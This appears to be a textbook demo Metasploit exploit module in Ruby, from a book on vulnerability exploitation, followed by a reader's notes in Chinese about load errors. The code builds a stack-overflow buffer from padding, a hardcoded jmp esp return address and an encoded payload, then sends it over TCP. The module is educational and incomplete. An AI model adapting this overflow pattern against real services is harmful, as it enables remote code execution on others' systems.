//其实就使用了通用跳转地址,jmp esp 0x7FFA4512
#/*****************************************************************************
# To be the apostrophe which changed "Impossible" into "I'm possible"!
#
#POC code of chapter 10.6 in book "Vulnerability Exploit and Analysis Technique"
#
#file name : test.rb
#author : failwest
#date : 2007.4.4
#description : used as a demo to show how to implemented exploit module of MSF
#Noticed : create a sub directory named "failwest" in the exploit directory
# of MSF 3.0. For example, the default directory of exploit is
# "C:\Program Files\Metasploit\Framework3\framework\modules\exploits"
# this module should be put into
# "C:\Program Files\Metasploit\Framework3\framework\modules\exploits\failwest\"
#version : 1.0
#E-mail : failwest@gmail.com
#
# Only for educational purposes enjoy the fun from exploiting :)
#******************************************************************************/
require 'msf/core'
module Msf
class Exploits::Failwest::Test < Msf::Exploit::Remote
include Exploit::Remote::Tcp
def exploit
connect
attack_buf = 'a'*200 + [target['Ret']].pack('V') + payload.encoded
sock.put(attack_buf)
handler
disconnect
end #end of exploit def
end #end of class def
end #end of module def
1.
我发现在自己的机子里无法执行该脚本,show exploits时没有显示,use failwest/test也是出现错误:[-] Failed to load module: failwest/test!(文件位置等完全按照书中所述).
2.
将有ruby语句的文本保存为以rb后缀的文件后,在"CMD shell"下无法执行:ruby: No such file or directory -- aa.rb (LoadError)!
111111111111
